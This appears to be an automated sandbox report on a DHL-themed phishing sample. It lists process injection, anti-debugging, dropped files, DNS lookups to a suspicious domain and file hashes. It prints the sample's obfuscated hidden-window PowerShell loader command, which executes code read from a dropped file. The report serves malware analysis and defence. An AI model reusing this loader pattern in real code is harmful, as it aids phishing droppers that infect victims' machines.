Malware Analysis Report

2025-08-11 02:16

Sample ID 240610-qp1nsaxbrc
Target 10062024_1326_09062024_DHL Package.zip
SHA256 dd7243dc57f78c2a9d515760aed44ff332a281f7e06c37f1b95887cff94a94a8
Tags
execution
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

dd7243dc57f78c2a9d515760aed44ff332a281f7e06c37f1b95887cff94a94a8

Threat Level: Likely malicious

The file 10062024_1326_09062024_DHL Package.zip was found to be: Likely malicious.

Malicious Activity Summary

execution

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Drops file in Program Files directory

Enumerates physical storage devices

Program crash

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-10 13:26

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-10 13:26

Reported

2024-06-10 13:30

Platform

win7-20240508-en

Max time kernel

149s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\DHL Package.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Indfrysningers.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Indfrysningers.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2992 set thread context of 2336 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Indfrysningers.exe

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Common Files\firbens\psycholeptic.ini C:\Users\Admin\AppData\Local\Temp\DHL Package.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\boltholes.obl C:\Users\Admin\AppData\Local\Temp\DHL Package.exe N/A

Enumerates physical storage devices

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2420 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\DHL Package.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2420 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\DHL Package.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2420 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\DHL Package.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2420 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\DHL Package.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2992 wrote to memory of 2560 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2992 wrote to memory of 2560 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2992 wrote to memory of 2560 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2992 wrote to memory of 2560 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2992 wrote to memory of 2336 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Indfrysningers.exe
PID 2992 wrote to memory of 2336 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Indfrysningers.exe
PID 2992 wrote to memory of 2336 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Indfrysningers.exe
PID 2992 wrote to memory of 2336 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Indfrysningers.exe
PID 2992 wrote to memory of 2336 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Indfrysningers.exe
PID 2992 wrote to memory of 2336 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Indfrysningers.exe

Processes

C:\Users\Admin\AppData\Local\Temp\DHL Package.exe

"C:\Users\Admin\AppData\Local\Temp\DHL Package.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -windowstyle hidden "$Uropfrer=Get-Content 'C:\Users\Admin\AppData\Local\Bridgebuilding\oralizes\indart\Mouthers\Afgiftsregler.del';$Skoleudgavers=$Uropfrer.SubString(54521,3);.$Skoleudgavers($Uropfrer)"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"

C:\Users\Admin\AppData\Local\Temp\Indfrysningers.exe

"C:\Users\Admin\AppData\Local\Temp\Indfrysningers.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 sa.columbrara.za.com udp
US 8.8.8.8:53 sa.columbrara.za.com udp
US 8.8.8.8:53 sa.columbrara.za.com udp
US 8.8.8.8:53 sa.columbrara.za.com udp
US 8.8.8.8:53 sa.columbrara.za.com udp
US 8.8.8.8:53 sa.columbrara.za.com udp

Files

memory/2992-8-0x0000000073691000-0x0000000073692000-memory.dmp

memory/2992-9-0x0000000073690000-0x0000000073C3B000-memory.dmp

memory/2992-11-0x0000000073690000-0x0000000073C3B000-memory.dmp

memory/2992-12-0x0000000073690000-0x0000000073C3B000-memory.dmp

memory/2992-10-0x0000000073690000-0x0000000073C3B000-memory.dmp

C:\Users\Admin\AppData\Local\Bridgebuilding\oralizes\indart\Mouthers\Afgiftsregler.del

MD5 b1bf3757ba661c2fc29713ddaa598605
SHA1 5c77e7e505aa16a208499b1a67089bcdba3d349b
SHA256 c8a6d8bb0a194f855387ef00c86f0016c1ba489eb7b6dc729af5853157d418c9
SHA512 06a766ab5d297082781db399571d458202bdf155ad1415de5bc453753b640dfba5c9c47047e0aefd964bc6b31a7161e50723a67db4c93276bc35c01412c1d40a

C:\Users\Admin\AppData\Local\Bridgebuilding\oralizes\indart\Mouthers\Timianernes.Vel

MD5 77c2017d3aab930e712847c30d7d5764
SHA1 f27a330028667e527305448d0a94913e3282c821
SHA256 9691d68779acccfebf0288f52c0becadf1aa9616c78eefa4c3cab657af0d9cee
SHA512 b8d15d0ed28792a921fbdb18b3d4017b1a76ae2f37cb4bc009b5517c050cdaba864e11549652036c88d56fbb31a4997343c64c7abb4265de82b86a7b848aa44a

memory/2992-16-0x0000000006410000-0x000000000BF8E000-memory.dmp

\Users\Admin\AppData\Local\Temp\Indfrysningers.exe

MD5 057849d89c720ddae62b9006fd7587f9
SHA1 66c5732d79b3514e7e98ac01a25b3362f82b5eed
SHA256 dd838e0ad2d227d581a04b9968609c1cf78f8570bcc36fe7abf176ec36d2b5e5
SHA512 f169462b72e8cf5263b79a8796ab95c2a3d144022e7d34efb911bf5d4cb1c23cb319a060b8688214c183d4fc906cd42f61756b62bbd4e872acf153d104031b90

memory/2992-21-0x0000000073690000-0x0000000073C3B000-memory.dmp

memory/2336-22-0x0000000000460000-0x00000000014C2000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-10 13:26

Reported

2024-06-10 13:29

Platform

win10v2004-20240426-en

Max time kernel

92s

Max time network

95s

Command Line

"C:\Users\Admin\AppData\Local\Temp\DHL Package.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Common Files\firbens\psycholeptic.ini C:\Users\Admin\AppData\Local\Temp\DHL Package.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\boltholes.obl C:\Users\Admin\AppData\Local\Temp\DHL Package.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\DHL Package.exe

"C:\Users\Admin\AppData\Local\Temp\DHL Package.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -windowstyle hidden "$Uropfrer=Get-Content 'C:\Users\Admin\AppData\Local\Bridgebuilding\oralizes\indart\Mouthers\Afgiftsregler.del';$Skoleudgavers=$Uropfrer.SubString(54521,3);.$Skoleudgavers($Uropfrer)"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2188 -ip 2188

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 2556

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 97.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 112.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp

Files

memory/2188-6-0x0000000073E7E000-0x0000000073E7F000-memory.dmp

memory/2188-7-0x0000000004540000-0x0000000004576000-memory.dmp

memory/2188-8-0x0000000004CA0000-0x00000000052C8000-memory.dmp

memory/2188-9-0x0000000073E70000-0x0000000074620000-memory.dmp

memory/2188-10-0x0000000073E70000-0x0000000074620000-memory.dmp

memory/2188-11-0x0000000004C50000-0x0000000004C72000-memory.dmp

memory/2188-12-0x0000000005440000-0x00000000054A6000-memory.dmp

memory/2188-13-0x00000000054B0000-0x0000000005516000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k2juaha0.dzb.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2188-23-0x0000000005620000-0x0000000005974000-memory.dmp

memory/2188-24-0x0000000005B30000-0x0000000005B4E000-memory.dmp

memory/2188-25-0x0000000005B60000-0x0000000005BAC000-memory.dmp

memory/2188-26-0x0000000006B00000-0x0000000006B96000-memory.dmp

memory/2188-27-0x0000000006030000-0x000000000604A000-memory.dmp

memory/2188-28-0x0000000006080000-0x00000000060A2000-memory.dmp

memory/2188-29-0x0000000007150000-0x00000000076F4000-memory.dmp

C:\Users\Admin\AppData\Local\Bridgebuilding\oralizes\indart\Mouthers\Afgiftsregler.del

MD5 b1bf3757ba661c2fc29713ddaa598605
SHA1 5c77e7e505aa16a208499b1a67089bcdba3d349b
SHA256 c8a6d8bb0a194f855387ef00c86f0016c1ba489eb7b6dc729af5853157d418c9
SHA512 06a766ab5d297082781db399571d458202bdf155ad1415de5bc453753b640dfba5c9c47047e0aefd964bc6b31a7161e50723a67db4c93276bc35c01412c1d40a

memory/2188-31-0x0000000007D80000-0x00000000083FA000-memory.dmp

memory/2188-33-0x0000000073E70000-0x0000000074620000-memory.dmp